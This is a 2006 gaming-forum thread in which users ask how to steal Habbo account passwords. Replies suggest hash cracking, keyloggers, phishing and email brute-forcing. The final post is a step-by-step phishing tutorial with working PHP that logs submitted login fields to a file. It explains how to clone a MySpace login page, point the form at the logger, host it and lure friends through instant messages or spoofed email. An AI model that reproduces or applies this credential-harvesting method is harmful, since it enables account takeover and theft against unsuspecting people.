ThyElite Forums  
Go Back   ThyElite Forums > Downloads > Habbo Downloads
Reload this Page Habbo Passwords.
Reply
 
Thread Tools Display Modes
(#1)
Old
Corcorino is Offline
Member
Corcorino is on a distinguished road
 
Posts: 18
Join Date: Aug 2006
Exclamation Habbo Passwords. - 08-12-2006, 06:17 AM

Anyone can tell me HC's or seamples Habbo's but whit furni,passwords and usernames.Or a programm to stealth passwords.
Reply With Quote
(#2)
Old
Xbxo77 is Offline
Master of the Post
Xbxo77 is on a distinguished road
 
Posts: 339
Join Date: Jul 2006
Default 08-12-2006, 09:47 AM

Your such a newb, habbo people dont give away username and passwords, if there was a program to steal passwords habbo would be getting sued for letting it happen...cuz its basically stealing peoples money, that also means that you could get arrested for having a program like that on your computer...think about it before you post and im pretty sure that there is already a post somewhat like this, look around befor you post


Yeah bitches i made my sig w/ paint, i got skills

Reply With Quote
(#3)
Old
MYMOMMAGOTBEEF is Offline
Lots o' Posts
MYMOMMAGOTBEEF is on a distinguished road
 
Posts: 471
Join Date: Jul 2006
Location: MN
Send a message via AIM to MYMOMMAGOTBEEF
Default 08-12-2006, 11:33 AM

There's a way to get peoples account's and passwords. Probably the only method. And yet it's the hardest method. First you need to be able to hack into habbo's database where all the user's passses,e-mails,age, and id's are found. Then another difficult is, all of Habbo's Password's in the database are coded in MD5(Message Digest) So you'll be need the program Cain and able. Then your going to need a word list (a big list of names, numbers, anything that can be a password) or a rainbow table which is the same as a wordlist but bigger. They are around a couple gb's. Then you can start cracking the md5 password hash with can and your password list. It could take a couple of days depending on how long the password really is. So knock your self out. I suggest cracking it during night time when your in bed. Or leave it on when your at school or something.

Actually there's other methods. Keylogg somebody (which copys every keystoke and send it to your e-mail)
Or create a phising page which is locate somewhere here from XOG. (a replicant of habbo login's page but it will send you the password and username when they log-in or attempt to login.
Hack the user's e-mail (figure theire e-mail out. Brute force into logging in. Then go to habbo and click on lost password so it's sent to the hacked e-mail



[Made By Xplogen, Thanks ]
Reply With Quote
(#4)
Old
LilBrowine is Offline
Lurker
LilBrowine is on a distinguished road
 
Posts: 4
Join Date: Aug 2006
Default 08-12-2006, 10:22 PM

I let the proram over nite it didnt send me the hackfile or w.e anyone have a keylog?
Reply With Quote
(#5)
Old
Pith is Offline
Elite Member
Pith is on a distinguished road
 
Posts: 161
Join Date: Jul 2006
Location: Arlington, Tejas
Send a message via AIM to Pith
Default 08-12-2006, 11:52 PM

Get the keylog
It's very simple



Reply With Quote
(#6)
Old
Irulebabey is Offline
Senior Member
Irulebabey is on a distinguished road
 
Posts: 104
Join Date: Jul 2006
Location: Hayward, CA AKA Tha Stack
Send a message via AIM to Irulebabey Send a message via Yahoo to Irulebabey
Default 08-13-2006, 06:55 PM

that'd be awsome to make a phishing page.... idunno how to do it though... but i wouldnt do it for habbo id do it for coke and runescape.... thatd be tits yes tits... anyone wanna help me here???? we can be partners fuck yea!!!!




Reply With Quote
(#7)
Old
MYMOMMAGOTBEEF is Offline
Lots o' Posts
MYMOMMAGOTBEEF is on a distinguished road
 
Posts: 471
Join Date: Jul 2006
Location: MN
Send a message via AIM to MYMOMMAGOTBEEF
Default 08-14-2006, 03:02 PM

I already have a partner. Sorry



[Made By Xplogen, Thanks ]
Reply With Quote
(#8)
Old
Irulebabey is Offline
Senior Member
Irulebabey is on a distinguished road
 
Posts: 104
Join Date: Jul 2006
Location: Hayward, CA AKA Tha Stack
Send a message via AIM to Irulebabey Send a message via Yahoo to Irulebabey
Default 08-17-2006, 12:19 PM

damn the partner!!! well can u send me a tutorial so i can make one???




Reply With Quote
(#9)
Old
connor2510 is Offline
Member
connor2510 is on a distinguished road
 
Posts: 11
Join Date: Aug 2006
Default i got a new cheat program - 08-17-2006, 12:26 PM

every1 u cnt keylogg or anyting only on coke u can
for my coke all u do is go to www.freecokeandstuff.tc.com
and then from there get stuff
any1 want free stuff from me searcgh my name
Attached Images
File Type: jpg f11.jpg (112.7 KB, 16 views)
Reply With Quote
(#10)
Old
MYMOMMAGOTBEEF is Offline
Lots o' Posts
MYMOMMAGOTBEEF is on a distinguished road
 
Posts: 471
Join Date: Jul 2006
Location: MN
Send a message via AIM to MYMOMMAGOTBEEF
Default 08-17-2006, 12:53 PM

Lol. How's going to trust that site Well. It's actually kind hard for a tutorial because mycoke is flash. And I don't know any flash. :\ But For a beginner to start playing with a phising page try making a fake login for myspace.com (i have before and got plenty) after your on myspace.com go to view,full source, then copy all of the source on myspace. (best to get the errored source that say's "you must be login to do that" that way you can lie to somebody and say look at my myspace pics. (but you have to be logged in to view) the rest of the tutorial....... lol go to grr you have to be a members well here: This part is not written by me. SO no kudos for me .


1. Decide who and where you want to get into. When I did this myself, I was trying to get into all of my friend's MySpace accounts. Then go to the website you chose, right-click, and View Source.

2. Save the source as login.html. Then open Notepad and paste the following into it:


foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;


Save as data.txt

3. Register at a free webhosting place that will let you use php. (I used 100webspace.com) Then register at a place that won't display advertisements on your site. (I used 50webs.com) It would be a good idea to try to login to the website your making a fake of but with a bad password. Copy the link for the error page.

4. Get a program that will let you save as .php (I used EditPlus2 from http://www.editplus.com) Open the program then copy and paste the following:


<?php
header("Location: someplace.html");
$handle = fopen("data.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>


Now, look at the second line of code. Do you notice '("Location: someplace.html")'? Change someplace.html to the error page. Save as log.php

5. Upload data.txt and log.php at the site that will let you use php. (100webspace.com) Then open login.html in Notepad.
Search for <form action="some file name"> Replace their file name with a link to your log.php.
Save and then upload login.html.

6. Test out your new login page. Load your data.txt from your website(yoururl.hostdomain/data.txt) and it should have your test login listed. You can re-uplod data.txt to get rid of your test login information.

Ok now that you have your fake login page done you need to get the people there. The method I chose to do was to make the page different and tell people it was a secret login page. I put it in my away message on AIM and told them if they logged in at that page they would see something cool. Another way is to spoof an email.

Hopefully this is helpful to some people. If there are any problems message me.

Good Luck,

Phoenix Rising



[Made By Xplogen, Thanks ]
Reply With Quote
Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Habbo Is Gay ROss Shithole 10 10-22-2006 04:33 PM
Ways to get passwords for paysites. Apollo Porn 6 08-23-2006 01:05 PM
Why is habbo J-Nice-84 Habbo Downloads 6 08-15-2006 03:09 PM
passwords farmgurl_cb Help! 10 07-19-2006 05:44 PM
weres the xxx passwords keenan General Talk 6 06-23-2006 01:55 PM



Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.